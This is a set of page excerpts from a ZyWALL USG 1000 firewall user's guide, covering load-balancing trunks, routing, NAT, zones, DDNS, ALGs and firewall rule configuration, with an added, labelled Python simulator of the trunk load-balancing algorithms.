Page 340: ...distribute the network traffic between the two interfaces by setting the weight of ge2 and ge3 to 2 and 1 respectively. The ZyWALL assigns the traffic of two sessions to ge2 for every session's traffic assigned to ge3. Figure 262 Weighted Round Robin Algorithm Example. Spillover: The spillover load balancing algorithm sends network traffic to the first interface in the trunk member list until the inte...

Page 341: ...old of the first interface is set to 800K. The ZyWALL sends network traffic of new sessions that exceed this limit to the secondary WAN interface. Figure 263 Spillover Algorithm Example. Finding Out More: See Section 6.5.5 on page 103 for related information on the Trunk screens. See Section 7.3 on page 122 for an example of how to configure load balancing. See Section 14.4 on page 345 for more backgrou...
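As an added illustration of the three trunk algorithms described on pages 339 to 341 (this is not code from the ZyWALL User's Guide or from ZyXEL; interface names, bandwidth figures and session sizes are constructed, and spillover is simplified to a per-session check against the first interface's threshold):

```python
"""Trunk load-balancing simulator (added example, not code from the ZyWALL
User's Guide).  It models the three algorithms the guide describes:
weighted round robin, spillover and least load first.  Interface names,
bandwidth figures and session sizes below are constructed for illustration."""
from dataclasses import dataclass
from typing import List


@dataclass
class Member:
    """One trunk member interface."""
    name: str
    weight: int = 1               # weighted round robin weight
    egress_kbps: int = 0          # egress bandwidth / spillover threshold (kbps)
    load_kbps: int = 0            # current measured outbound throughput (kbps)

    def utilization(self) -> float:
        # Outbound bandwidth utilization = measured throughput / egress bandwidth
        return self.load_kbps / self.egress_kbps if self.egress_kbps else float("inf")


class Trunk:
    def __init__(self, members: List[Member]):
        if not members:
            raise ValueError("a trunk needs at least one member interface")
        self.members = members
        self._wrr_pos = 0

    def weighted_round_robin(self, session_kbps: int) -> Member:
        """Cycle through members proportionally to weight (ge2=2, ge3=1 -> ge2, ge2, ge3)."""
        cycle = [m for m in self.members for _ in range(m.weight)]
        member = cycle[self._wrr_pos % len(cycle)]
        self._wrr_pos += 1
        member.load_kbps += session_kbps
        return member

    def spillover(self, session_kbps: int) -> Member:
        """Fill members in list order; a session that would push a member past its
        threshold spills over to the next one.  If every member is full the last
        member takes it (constructed fallback; the guide does not state this case)."""
        for member in self.members:
            if member.load_kbps + session_kbps <= member.egress_kbps:
                member.load_kbps += session_kbps
                return member
        self.members[-1].load_kbps += session_kbps
        return self.members[-1]

    def least_load_first(self, session_kbps: int) -> Member:
        """Send the new session to the member with the lowest outbound utilization;
        ties go to the earlier member in the list."""
        member = min(self.members, key=Member.utilization)
        member.load_kbps += session_kbps
        return member


def distribute(trunk: Trunk, algorithm: str, sessions: List[int]) -> List[str]:
    """Assign each new session (size in kbps) with the named algorithm; return member names."""
    pick = {
        "wrr": trunk.weighted_round_robin,
        "spillover": trunk.spillover,
        "llf": trunk.least_load_first,
    }[algorithm]
    return [pick(s).name for s in sessions]


if __name__ == "__main__":
    # ge2 weight 2, ge3 weight 1: two sessions to ge2 for every one to ge3
    wrr = Trunk([Member("ge2", weight=2), Member("ge3", weight=1)])
    print("wrr:", distribute(wrr, "wrr", [100] * 6))
    # spillover threshold of the first interface set to 800K
    sp = Trunk([Member("ge2", egress_kbps=800), Member("ge3", egress_kbps=800)])
    print("spillover:", distribute(sp, "spillover", [300, 300, 300, 200]))
    # least load first compares utilization, not absolute load
    llf = Trunk([Member("ge2", egress_kbps=1000, load_kbps=500),
                 Member("ge3", egress_kbps=2000, load_kbps=800)])
    print("llf:", distribute(llf, "llf", [100, 100, 100]))
```

Note that least load first sends the first sessions to ge3 even though its absolute load is higher, because its utilization (800/2000) is lower than ge2's (500/1000).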

Page 342: ... this button to display a greater or lesser number of configuration fields. Enable Link Sticking: Enable link sticking to have the ZyWALL route sessions from one source to the same destination through the same link for a period of time. This is useful for accessing servers that are incompatible with a user's sessions coming from different links. For example, this is useful when a server requires authen...

Page 343: ...dds all external interfaces into the pre-configured system default SYSTEM_DEFAULT_WAN_TRUNK. You cannot delete it. You can create your own User Configuration trunks. Add: Click this to create a new user-configured trunk. Edit: Double-click an entry or select it and click Edit to open a screen where you can modify the entry's settings. Remove: To remove a user-configured trunk, select it and click Remove. Th...

Page 344: ...lick Add to add a new member interface after the selected member interface. Edit: Double-click an entry or select it and click Edit to open a screen where you can modify the entry's settings. Remove: To remove a member interface, select it and click Remove. The ZyWALL confirms you want to remove it before doing so. Move: To move an interface to a different number in the list, click the Move icon. In the fie...

Page 345: ...e traffic the ZyWALL sends through that interface. Ingress Bandwidth: This field displays with the least load first load balancing algorithm. It displays the maximum number of kilobits of data the ZyWALL is to allow to come in through the interface per second. Egress Bandwidth: This field displays with the least load first or spillover load balancing algorithm. It displays the maximum number of kilobits...

Page 347: ... default gateway R1. You create one policy route to connect to services offered by your ISP behind router R2. You create another policy route to communicate with a separate network behind another router R3 connected to the LAN. Figure 266 Example of Policy Routing Topology. Note: You can generally just use policy routes. You only need to use static routes if you have a large network with multiple router...

Page 348: ... policy routes to manage other types of traffic (like ICMP traffic) and send traffic through VPN tunnels. Note: Bandwidth management in policy routes has priority over application patrol bandwidth management. Cost Savings: IPPR allows organizations to distribute interactive traffic on high-bandwidth, high-cost paths while using low-cost paths for batch traffic. Load Sharing: Network administrators can use ...

Page 349: ...ng the route based on the application types and traffic flow. Packets are marked with DiffServ Code Points (DSCPs) indicating the level of service desired. This allows the intermediary DiffServ-compliant network devices to handle the packets differently depending on the code points without the need to negotiate paths or remember state information for every flow. In addition, applications do not have to ...

Page 350: ...red policy routes and turn policy routing based bandwidth management on or off. A policy route defines the matching criteria and the action to take when a packet meets the criteria. The action is taken only when all the criteria are met. The criteria can include the user name, source address and incoming interface, destination address, schedule, IP protocol (ICMP, UDP, TCP, etc.) and port. The actions that can ...

Page 351: ...dit: Double-click an entry or select it and click Edit to open a screen where you can modify the entry's settings. Remove: To remove an entry, select it and click Remove. The ZyWALL confirms you want to remove it before doing so. Activate: To turn on an entry, select it and click Activate. Inactivate: To turn off an entry, select it and click Inactivate. Move: To change a rule's position in the numbered list, s...

Page 352: ...SCP value of the outgoing packets that match this route. If this field displays a DSCP value, the ZyWALL applies that DSCP value to the route's outgoing packets. preserve means the ZyWALL does not modify the DSCP value of the route's outgoing packets. default means the ZyWALL sets the DSCP value of the route's outgoing packets to 0. The af choices stand for Assured Forwarding. The number following the a...

Page 353: ...onfiguration > Network > Routing > Policy Route > Add. The following table describes the labels in this screen. Table 84 Configuration > Network > Routing > Policy Route > Edit. LABEL / DESCRIPTION. Create new Object: Use this to configure any new settings objects that you need to use in this screen. Configuration: Enable: Select this to activate the policy. Description: Enter a descriptive name of up to 31 printable ASCII c...

Page 354: ...ne of three drop preferences. See Assured Forwarding (AF) PHB for DiffServ on page 359 for more details. User Defined DSCP Code: Use this field to specify a custom DSCP code point. Schedule: Select a schedule to control when the policy route is active. none means the route is active at all times if enabled. Service: Select a service or service group to identify the type of traffic to which this policy route...

Page 355: ...gh the specified interface. Auto Disable: This field displays when you select Interface or Trunk in the Type field. Select this to have the ZyWALL automatically disable this policy route when the next hop's connection is down. DSCP Marking: DSCP Marking: Set how the ZyWALL handles the DSCP value of the outgoing packets that match this route. Select one of the pre-defined DSCP values to apply or select Us...

Page 356: ...before using a port triggering rule. Add: Click this to create a new entry. Select an entry and click Add to create a new entry after the selected entry. Edit: Select an entry and click this to be able to modify it. You can also just double-click an entry to be able to modify it. Remove: Select an entry and click this to delete it. Move: The ordering of your rules is important as they are applied in order o...

Page 357: ...andwidth unbudgeted and do not enable Maximize Bandwidth Usage. Bandwidth Priority: Enter a number between 1 and 7 to set the priority for traffic. The smaller the number, the higher the priority. If you set the maximum bandwidth to 0, the bandwidth priority will be changed to 0 after you click OK. That means the route has the highest priority and will get all the bandwidth it needs up to the maximum ava...

Page 358: ... to remove it before doing so. This is the number of an individual static route. Destination: This is the destination IP address. Subnet Mask: This is the IP subnet mask. Next Hop: This is the IP address of the next-hop gateway or the interface through which the traffic is routed. The gateway is a router or switch on the same segment as your ZyWALL's interface(s). The gateway helps forward packets to their ...

Page 359: ...s. If congestion occurs between classes, the traffic in the higher class (smaller numbered class) is generally given priority. Combining the classes and drop precedence produces the Gateway IP: Select the radio button and enter the IP address of the next-hop gateway. The gateway is a router or switch on the same segment as your ZyWALL's interface(s). The gateway helps forward packets to their destinations ...

Page 360: ...computer. Port triggering is used especially when the remote server responds using a different port from the port the client computer used to request a service. The ZyWALL records the IP address of a client computer that sends traffic to a remote server to request a service (incoming service). When the ZyWALL receives a new connection (trigger service) from the remote server, the ZyWALL forwards the traf...

Page 361: ...route is not using among the policy routes that require more bandwidth. When you enable maximize bandwidth usage, the ZyWALL first makes sure that each policy route gets up to its bandwidth allotment. Next, the ZyWALL divides up an interface's available bandwidth (bandwidth that is unbudgeted or unused by the policy routes) depending on how many policy routes require more bandwidth and on their priority...

Page 363: ...o in this Chapter. Use the RIP screen (see Section 16.2 on page 364) to configure the ZyWALL to use RIP to receive and/or send routing information. Use the OSPF screen (see Section 16.3 on page 365) to configure general OSPF settings and manage OSPF areas. Use the OSPF Area Add/Edit screen (see Section 16.3.2 on page 372) to create or edit an OSPF area. 16.1.2 What You Need to Know: The ZyWALL supports two s...

Page 364: ...gs before you can use it in an interface. First, the Authentication field specifies how to verify that the routing information that is received is the same routing information that is sent. This is discussed in more detail in Authentication Types on page 375. Second, the ZyWALL can also redistribute routing information from non-RIP networks, specifically OSPF networks and static routes, to the RIP networ...

Page 365: ...nd 255. MD5 Authentication Key: This field is available if the Authentication is MD5. Type the password for MD5 authentication. The password can consist of alphanumeric characters and the underscore, and it can be up to 16 characters long. Redistribute: Active OSPF: Select this to use RIP to advertise routes that were learned through OSPF. Metric: Type the cost for routes provided by OSPF. The metric represe...

Page 366: ...sents a group of adjacent networks and is identified by a 32-bit ID. In OSPF, this number may be expressed as an integer or as an IP address. There are several types of areas. The backbone is the transit area that routes packets between other areas. All other areas are connected to the backbone. A normal area is a group of adjacent networks. A normal area has routing information about the OSPF AS, any net...

Page 367: ...o confirm which neighbor layer-3 devices exist, and then they exchange database descriptions (DDs) to create a synchronized link-state database. The link-state database contains records of router IDs, their associated links and path costs. The link-state database is then constantly updated through Link State Advertisements (LSA). Each router uses the link-state database and the Dijkstra algorithm to comput...

Page 368: ...DR. All of the routers only exchange information with the DR and the BDR, instead of exchanging information with all of the other routers in the group. The DR and BDR are selected by priority; if two routers have the same priority, the highest router ID is used. The DR and BDR are selected in each group of routers that are directly connected to each other. If a router is directly connected to several gro...

Page 369: ...the backbone. You cannot create a virtual link to a router in a different area. OSPF Configuration: Follow these steps when you configure OSPF on the ZyWALL. 1. Enable OSPF. 2. Set up the OSPF areas. 3. Configure the appropriate interfaces. See Section 13.3.1 on page 284. 4. Set up virtual links as needed. 16.3.1 Configuring the OSPF Screen: Use the first OSPF screen to specify the OSPF router the ZyWALL uses i...

Page 370: ...istribute: Active RIP: Select this to advertise routes that were learned from RIP. The ZyWALL advertises routes learned from RIP to Normal and NSSA areas but not to Stub areas. Type: Select how OSPF calculates the cost associated with routing information from RIP. Choices are Type 1 and Type 2. Type 1: cost = OSPF AS cost + external cost (Metric). Type 2: cost = external cost (Metric); the OSPF AS cost is ignored. Metr...

Page 371: ...reas in the ZyWALL. Add: Click this to create a new OSPF area. Edit: Double-click an entry or select it and click Edit to open a screen where you can modify the entry's settings. Remove: To remove an entry, select it and click Remove. The ZyWALL confirms you want to remove it before doing so. This field is a sequential value, and it is not associated with a specific area. Area: This field displays the 32-bit ...

Page 372: ... information about the OSPF AS and about networks outside the OSPF AS. Stub: This area is a stub area. It has routing information about the OSPF AS but not about networks outside the OSPF AS. It depends on a default route to send information outside the OSPF AS. NSSA: This area is a Not-So-Stubby Area (NSSA) per RFC 1587. It has routing information about the OSPF AS and networks that are outside the OSPF ...

Page 373: ...should set up the virtual link on the ABR that is connected to the other area and on the ABR that is connected to the backbone. Add: Click this to create a new virtual link. Edit: Double-click an entry or select it and click Edit to open a screen where you can modify the entry's settings. Remove: To remove an entry, select it and click Remove. The ZyWALL confirms you want to remove it before doing so. This...

Page 374: ...entication. Text uses a plain-text password that is sent over the network (not very secure). MD5 uses an MD5 password and authentication ID (most secure). Same as Area has the virtual link also use the Authentication settings above. Text Authentication Key: This field is available if the Authentication is Text. Type the password for text authentication. The key can consist of alphanumeric characters and the ...

Page 375: ...ord and authentication ID. MD5 is an authentication method that produces a 128-bit checksum, called a message digest, for each packet. It also includes an authentication ID, which can be set to any value between 1 and 255. The ZyWALL only accepts packets if these conditions are satisfied: The packet's authentication ID is the same as the authentication ID of the interface that received it. The packet's me...

Page 377: ... settings such as firewall rules, Anti-X and remote management. Zones cannot overlap. Each Ethernet interface, VLAN interface, bridge interface, PPPoE/PPTP interface, auxiliary interface and VPN tunnel can be assigned to at most one zone. Virtual interfaces are automatically assigned to the same zone as the interface on which they run. Figure 279 Example Zones. 17.1.1 What You Can Do in this Chapter: Use the...

Page 378: ...ple, DMZ to DMZ), but many other types of zone-based security and policy settings do not affect intra-zone traffic. Inter-zone Traffic: Inter-zone traffic is traffic between interfaces or VPN tunnels in different zones. For example, in Figure 279 on page 377, traffic between VLAN 1 and the Internet is inter-zone traffic. This is the normal case when zone-based security and policy settings apply. Extra-zone ...

Page 379: ...his to create a new user-configured zone. Edit: Double-click an entry or select it and click Edit to open a screen where you can modify the entry's settings. Remove: To remove a user-configured trunk, select it and click Remove. The ZyWALL confirms you want to remove it before doing so. Object References: Select an entry and click Object References to open a screen that shows which settings use the entry ...

Page 380: ...ters, underscores (_), or dashes (-), but the first character cannot be a number. This value is case-sensitive. Block Intra-zone Traffic: Select this check box to block network traffic between members in the zone. Member List: Available lists the interfaces and VPN tunnels that do not belong to any zone. Select the interfaces and VPN tunnels that you want to add to the zone you are editing and click the right ar...

Page 381: ...the domain name to contact you (in NetMeeting, CU-SeeMe, etc.) or to access your FTP server or Web site, regardless of the current IP address. Note: You must have a public WAN IP address to use Dynamic DNS. You must set up a dynamic DNS account with a supported DNS service provider before you can use Dynamic DNS services with the ZyWALL. When registration is complete, the DNS service provider gives you a pas...

Page 382: ...n. Figure 282 Configuration > Network > DDNS. The following table describes the labels in this screen. Table 97 Configuration > Network > DDNS. LABEL / DESCRIPTION. Add: Click this to create a new entry. Edit: Double-click an entry or select it and click Edit to open a screen where you can modify the entry's settings. Remove: To remove an entry, select it and click Remove. The ZyWALL confirms you want to remove it befo...

Page 383: ...ternate interface to use for updating the IP address mapped to the domain name, followed by how the ZyWALL determines the IP address for the domain name. The ZyWALL uses the backup interface and IP address when the primary interface is disabled, its link is down, or its connectivity check fails. from interface: The IP address comes from the specified interface. auto detected: The DDNS server checks the so...

Page 384: ...Table 98 Configuration > Network > DDNS > Add. LABEL / DESCRIPTION. Show Advance Settings / Hide Advance Settings: Click this button to display a greater or lesser number of configuration fields. Enable DDNS Profile: Select this check box to use this DDNS entry. Profile Name: When you are adding a DDNS entry, type a descriptive name for this DDNS entry in the ZyWALL. You may use 1-31 alphanumeric characters, undersco...

Page 385: ...face: The ZyWALL uses the IP address of the specified interface. This option appears when you select a specific interface in the Primary Binding Address Interface field. Auto: If the interface has a dynamic IP address, the DDNS server checks the source IP address of the packets from the ZyWALL for the IP address to use for the domain name. You may want to use this if there are one or more NAT routers be...

Page 386: ... feature to alias subdomains to be aliased to the same IP address as your dynamic domain name. This feature is useful if you want to be able to use, for example, www.yourhost.dyndns.org and still reach your hostname. Mail Exchanger: This option is only available with a DynDNS account. DynDNS can route e-mail for your domain name to a mail server, called a mail exchanger. For example, DynDNS routes e-mail f...

Page 387: ...n the private network available by using ports to forward packets to the appropriate private IP address. Suppose you want to assign ports 21-25 to one FTP, Telnet and SMTP server (A in the example), port 80 to another (B in the example) and assign a default server IP address of 192.168.1.35 to a third (C in the example). You assign the LAN IP addresses and the ISP assigns the WAN IP address. The NAT network ...

Page 388: ... 12.3 on page 158 for an example of how to configure NAT to allow SIP traffic from the WAN to an IPPBX or SIP server on the DMZ. 19.2 The NAT Screen: The NAT summary screen provides a summary of all NAT rules and their configuration. In addition, this screen allows you to create new NAT rules and edit and delete existing NAT rules. To access this screen, log in to the Web Configurator and click Configura...

Page 389: ...isplays the original destination IP address or address object of traffic that matches this NAT entry. It displays any if there is no restriction on the original destination IP address. Mapped IP: This field displays the new destination IP address for the packet. Protocol: This field displays the service used by the packets for this NAT entry. It displays any if there is no restriction on the services. Or...

Page 390: ...figuration > Network > NAT > Add. The following table describes the labels in this screen. Table 100 Configuration > Network > NAT > Add. LABEL / DESCRIPTION. Create new Object: Use to configure any new settings objects that you need to use in this screen. Enable Rule: Use this option to turn the NAT rule on or off. Rule Name: Type in the name of the NAT rule. The name is used to refer to the NAT rule. You may use 1-31 al...

Page 391: ...ing interface's IP addresses (including dynamic addresses) or those of any virtual interfaces built upon the selected incoming interface. User Defined: Select this to manually enter an IP address in the User Defined field. For example, you could enter a static public IP assigned by the ISP without having to create a virtual interface for it. Host address: select a host address object to use the IP address...

Page 392: ...destination ports this NAT rule supports. Original End Port: This field is available if Mapping Type is Ports. Enter the end of the range of original destination ports this NAT rule supports. Mapped Start Port: This field is available if Mapping Type is Ports. Enter the beginning of the range of translated destination ports if this NAT rule forwards the packet. Mapped End Port: This field is available if ...

Page 393: ...fter you configure your NAT rule settings, click the Firewall link to configure a firewall rule to allow the NAT rule's traffic to come in. The ZyWALL checks NAT rules before it applies To-ZyWALL firewall rules, so To-ZyWALL firewall rules do not apply to traffic that is forwarded by NAT rules. The ZyWALL still checks other firewall rules according to the source IP address and mapped IP address. OK: Cli...

Page 394: ... 1. NAT loopback uses the IP address of the ZyWALL's LAN interface (192.168.1.1) as the source address of the traffic going from the LAN users to the LAN SMTP server. Figure 288 LAN to LAN Traffic. The LAN SMTP server replies to the ZyWALL's LAN IP address and the ZyWALL changes the source address to 1.1.1.1 before sending it to the LAN user. The return traffic's source matches the original destination ...

Page 395: ...N user without the traffic going through NAT, the source would not match the original destination address, which would cause the LAN user's computer to shut down the session. Figure 289 LAN to LAN Return Traffic (figure labels: 192.168.1.21, LAN, 192.168.1.89, Source 1.1.1.1 SMTP, NAT, Source 192.168.1.21 SMTP) ...

Page 397: ...nt connected to the LAN zone wants to open a web page, its HTTP request is redirected to proxy server A first. If proxy server A cannot find the web page in its cache, a policy route allows it to access the Internet to get them from a server. Proxy server A then forwards the response to the client. Figure 290 HTTP Redirect Example. 20.1.1 What You Can Do in this Chapter: Use the HTTP Redirect screens (see...

Page 398: ...s: 1. Firewall 2. Application Patrol 3. HTTP Redirect 4. Policy Route. Even if you set a policy route to the same incoming interface and service as an HTTP redirect rule, the ZyWALL checks the HTTP redirect rules first and forwards HTTP traffic to a proxy server if matched. You need to make sure there is no firewall rule(s) blocking the HTTP requests from the client to the proxy server. You also need to manu...

Page 399: ...table describes the labels in this screen. Table 101 Configuration > Network > HTTP Redirect. LABEL / DESCRIPTION. Add: Click this to create a new entry. Edit: Double-click an entry or select it and click Edit to open a screen where you can modify the entry's settings. Remove: To remove an entry, select it and click Remove. The ZyWALL confirms you want to remove it before doing so. Activate: To turn on an entry, sel...

Page 400: ...ed settings. Table 101 Configuration > Network > HTTP Redirect (continued). LABEL / DESCRIPTION. Table 102 Network > HTTP Redirect > Edit. LABEL / DESCRIPTION. Enable: Use this option to turn the HTTP redirect rule on or off. Name: Enter a name to identify this rule. You may use 1-31 alphanumeric characters, underscores (_), or dashes (-), but the first character cannot be a number. This value is case-sensitive. Interface: Select t...

Page 403: ...er Internet. H.323: A teleconferencing protocol suite that provides audio, data and video conferencing. FTP: File Transfer Protocol, an Internet file transfer service. The following example shows SIP signaling (1) and audio (2) sessions between SIP clients A and B and the SIP server. Figure 293 SIP ALG Example. The ALG feature is only needed for traffic that goes through the ZyWALL's NAT. 21.1.1 What You Can Do...

Page 404: ...erver from the WAN. H.323 ALG: The H.323 ALG supports peer-to-peer H.323 calls. The H.323 ALG handles H.323 calls that go through NAT or that the ZyWALL routes. You can also make other H.323 calls that do not go through NAT or routing. Examples would be calls between LAN IP addresses that are on the same subnet. The H.323 ALG allows calls to go out through NAT. For example, you could make a call from a pr...

Page 405: ...es the application patrol (see Chapter 32 on page 527) to use the same port numbers for SIP traffic. Likewise, configuring the application patrol to use custom port numbers for SIP traffic also configures SIP ALG to use the same port numbers for SIP traffic. Peer-to-Peer Calls and the ZyWALL: The ZyWALL ALG can allow peer-to-peer VoIP calls for both H.323 and SIP. You must configure the firewall and NAT ...

Page 406: ...return traffic for the calls initiated from the LAN IP addresses. For example, you configure firewall and NAT rules to allow LAN IP address A to receive calls through public WAN IP address 1. You configure different firewall and port forwarding rules to allow LAN IP address B to receive calls through public WAN IP address 2. You configure corresponding policy routes to have calls from LAN IP address A...

Page 407: ... to allow sessions initiated from the WAN. 21.2 The ALG Screen: Click Configuration > Network > ALG to open the ALG screen. Use this screen to turn ALGs off or on, configure the port numbers to which they apply, and configure SIP ALG time-outs. Note: If the ZyWALL provides an ALG for a service, you must enable the ALG in order to use the application patrol on that service's traffic. Figure 297 Configuration > Ne...

Page 408: ...out. Most SIP clients have an expire mechanism indicating the lifetime of signaling sessions. The SIP user agent sends registration packets to the SIP server periodically and keeps the session alive in the ZyWALL. If the SIP client does not have this mechanism and makes no calls during the ZyWALL SIP timeout, the ZyWALL deletes the signaling session after the timeout period. Enter the SIP signaling ses...

Page 409: ... could also have a trunk with one interface set to active and a second interface set to passive. The ZyWALL does not automatically change ALG managed Enable FTP ALG: Turn on the FTP ALG to detect FTP (File Transfer Program) traffic and help build FTP sessions through the ZyWALL's NAT. Enabling the FTP ALG also allows you to use the application patrol to detect FTP traffic and manage the FTP traffic's b...

Page 410: ...ard teleconferencing protocol suite that provides audio, data and video conferencing. It allows for real-time point-to-point and multipoint communication between client computers over a packet-based network that does not provide a guaranteed quality of service. NetMeeting uses H.323. SIP: The Session Initiation Protocol (SIP) is an application-layer control (signaling) protocol that handles the setting up ...

Page 411: ...WALL. Suppose you configure access privileges for IP address 192.168.1.27 and use static DHCP to assign it to Tim's computer's MAC address of 12:34:56:78:90:AB. IP/MAC binding drops traffic from any computer trying to use IP address 192.168.1.27 with another MAC address. Figure 298 IP/MAC Binding Example. 22.1.1 What You Can Do in this Chapter: Use the Summary and Edit screens (Section 22.2 on page 412) ...

Page 412: ...twork > IP/MAC Binding to open the IP/MAC Binding Summary screen. This screen lists the total number of IP-to-MAC address bindings for devices connected to each supported interface. Figure 299 Configuration > Network > IP/MAC Binding > Summary. The following table describes the labels in this screen. Table 104 Configuration > Network > IP/MAC Binding > Summary. LABEL / DESCRIPTION. Edit: Double-click an entry or select ...

Page 413: ...'s total number of IP/MAC bindings and IP addresses that the interface has assigned by DHCP. Apply: Click Apply to save your changes back to the ZyWALL. Table 104 Configuration > Network > IP/MAC Binding > Summary (continued). LABEL / DESCRIPTION. Table 105 Configuration > Network > IP/MAC Binding > Edit. LABEL / DESCRIPTION. IP/MAC Binding Settings: Interface Name: This field displays the name of the interface within the Z...

Page 414: ...omputer's MAC address is in the table, the ZyWALL assigns the corresponding IP address. You can also access this table from the interface's edit screen. Add: Click this to create a new entry. Edit: Double-click an entry or select it and click Edit to open a screen where you can modify the entry's settings. Remove: To remove an entry, select it and click Remove. The ZyWALL confirms you want to remove it befo...

Page 415: ...is to assign to a device with the entry's MAC address. MAC Address: Enter the MAC address of the device to which the ZyWALL assigns the entry's IP address. Description: Enter up to 64 printable ASCII characters to help identify the entry. For example, you may want to list the computer's owner. OK: Click OK to save your changes back to the ZyWALL. Cancel: Click Cancel to exit this screen without saving. Table...

Page 416: ...yWALL does not apply IP/MAC binding. Add icon: Click the Add icon to add a new entry. Click the Remove icon to delete an entry. A window displays asking you to confirm that you want to delete it. Apply: Click Apply to save your changes back to the ZyWALL. Table 107 Configuration > Network > IP/MAC Binding > Exempt List (continued). LABEL / DESCRIPTION ...

Page 417: ...System (OS) option and security requirements to gain access. See Chapter 49 on page 783 for how to configure endpoint security objects to use with authentication policies. In the following figure, the ZyWALL's authentication policy requires endpoint security checking on local user A. A passes authentication and the endpoint security check and is given access. Local user B passes authentication but fails ...

Page 418: ...atch one of the authentication policy's endpoint security objects in order to gain access. Forced User Authentication: Instead of making users for which user-aware policies have been configured go to the ZyWALL Login screen manually, you can configure the ZyWALL to display the Login screen automatically whenever it routes HTTP traffic for anyone who has not logged in yet. Note: This works with HTTP tra...

Page 419: ...ick Remove to delete it (or them). Authentication Policy Summary: Use this table to manage the ZyWALL's list of authentication policies. Add: Click this to create a new entry. Select an entry and click Add to create a new entry after the selected entry. Edit: Double-click an entry or select it and click Edit to open a screen where you can modify the entry's settings. Remove: To remove an entry, select it and ...

Page 420: ...the source address object to which this policy applies. Destination: This displays the destination address object to which this policy applies. Schedule: This field displays the schedule object that dictates when the policy applies. none means the policy is active at all times if enabled. Authentication: This field displays the authentication requirement for users when their traffic matches this policy. T...

Page 421: ...ve from the member list and click the left arrow button to remove them Figure 305 Configuration Auth Policy Add Exceptional Service 23 2 2 Creating Editing an Authentication Policy Click Configuration Auth Policy and then the Add or Edit icon to open the Endpoint Security Edit screen Use this screen to configure an authentication policy ...

Page 422: ...f up to 60 printable ASCII characters for the policy Spaces are allowed This field is available for user configured policies User Authentication Policy Use this section of the screen to determine which traffic requires or does not require the senders to be authenticated in order to be routed Source Address Select a source address or address group for whom this policy applies Select any if the poli...

Page 423: ...ation Enable EPS Checking Select this to have the ZyWALL check that users' computers meet the Operating System OS and security requirements of one of the policy's selected endpoint security objects before granting access Periodical checking time Select this and specify a number of minutes to have the ZyWALL repeat the endpoint security check at a regular interval Available EPS Object Selected EPS O...

Page 424: ...Chapter 23 Authentication Policy ZyWALL USG 1000 User s Guide 424 ...

Page 425: ...on from within the LAN zone and responses to this request are allowed However other Telnet traffic initiated from the WAN or DMZ zone and destined for the LAN zone is blocked Communications between the WAN and the DMZ zones are allowed The firewall allows VPN traffic between any of the networks Figure 307 Default Firewall Action 24 1 1 What You Can Do in this Chapter Use the Firewall screens Secti...

Page 426: ... only LAN WAN computers to access or manage the ZyWALL The ZyWALL drops most packets from the WAN zone to the ZyWALL itself except for VRRP traffic for Device HA and ESP AH IKE NATT HTTPS services for VPN tunnels and generates a log Table 110 Default Firewall Behavior FROM ZONE TO ZONE BEHAVIOR From WAN to ZyWALL Traffic from the WAN to the ZyWALL itself is allowed for certain default services des...

Page 427: ...user name user's login name on the ZyWALL source IP address destination IP address and IP protocol type of network traffic against the firewall rules in the order you list them When the traffic matches a rule the ZyWALL takes the action specified in the rule User Specific Firewall Rules You can specify users or user groups in firewall rules For example to allow a specific user from any computer to...

Page 428: ...ons a client can use Finding Out More See Section 6 5 14 on page 107 for related information on the Firewall screens See Section 7 6 6 on page 139 for an example of creating firewall rules as part of configuring user aware access control Section 7 6 on page 131 See Section 7 10 3 on page 151 for an example of creating a firewall rule to allow H 323 traffic from the WAN to the LAN See Section 7 11 ...

Page 429: ... rules Any traffic that does not match the first firewall rule will match the second rule and the ZyWALL forwards it Now suppose that your company wants to let the CEO use IRC You can configure a LAN to WAN firewall rule that allows IRC traffic from the IP address of the CEO's computer You can also configure a LAN to WAN rule that allows IRC traffic from any computer through which the CEO logs int...

Page 430: ...rvice on the WAN The second row blocks LAN access to the IRC service on the WAN The third row is the firewall's default policy of allowing all traffic from the LAN to go to the WAN Alternatively you configure a LAN to WAN rule with the CEO's user name say CEO to allow IRC traffic from any source IP address to go to any destination address Your firewall would have the following configuration Table ...

Page 431: ...e ZyWALL would drop it and not check any other firewall rules 24 1 4 Firewall Rule Configuration Example The following Internet firewall rule example allows Doom players from the WAN to IP addresses 192 168 1 10 through 192 168 1 15 Dest_1 on the LAN 1 Click Configuration Firewall In the summary of firewall rules click Add in the heading row to configure a new first entry Remember the sequence pri...

Page 432: ...gure 312 Firewall Example Create a Service Object 6 Select From WAN and To LAN1 7 Enter the name of the firewall rule 8 Select Dest_1 for the Destination and Doom as the Service Enter a description and configure the rest of the screen as follows Click OK when you are done Figure 313 Firewall Example Edit a Firewall Rule ...

Page 433: ...wever allowing asymmetrical routes may let traffic from the WAN go directly to the LAN without passing through the ZyWALL A better solution is to use virtual interfaces to put the ZyWALL and the backup gateway on separate subnets Virtual interfaces allow you to partition your network into logical sections over the same interface See the chapter about interfaces for more information By putting LAN ...

Page 434: ...to the selected direction Note the following If you enable intra zone traffic blocking see the chapter about zones the firewall automatically creates implicit rules to deny packet passage between the interfaces in the specified zone Besides configuring the firewall you also need to configure NAT rules to allow computers on the WAN to access LAN devices See Chapter 19 on page 387 for more informati...

Page 435: ... If an alternate gateway on the LAN has an IP address in the same subnet as the ZyWALL's LAN IP address return traffic may not go through the ZyWALL This is called an asymmetrical or triangle route This causes the ZyWALL to reset the connection as the connection has not been acknowledged Select this check box to have the ZyWALL permit the use of asymmetrical route topology on the network not reset...

Page 436: ...nactivate Move To change a rule's position in the numbered list select the rule and click Move to display a field to type a number for where you want to put that rule and press ENTER to move the rule to the number that you typed The ordering of your rules is important as they are applied in order of their numbering The following read only fields summarize the rules you have created that apply to t...

Page 437: ...he passage of packets allow Log This field shows you whether a log and alert is created when packets match this rule or not Apply Click Apply to save your changes back to the ZyWALL Reset Click Reset to return the screen to its last saved settings Table 114 Configuration Firewall continued LABEL DESCRIPTION Table 115 Configuration Firewall Add LABEL DESCRIPTION Create new Object Use to configure a...

Page 438: ... address should be within the IP address range Source Select a source address or address group for whom this rule applies Select any if the policy is effective for every source Destination Select a destination address or address group for whom this rule applies Select any if the policy is effective for every destination Service Select a service or service group from the drop down list box Access U...

Page 439: ... Create rules below to apply other limits for specific users or addresses Rule Summary This table lists the rules for limiting the number of concurrent sessions hosts can have Add Click this to create a new entry Select an entry and click Add to create a new entry after the selected entry Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry's setti...

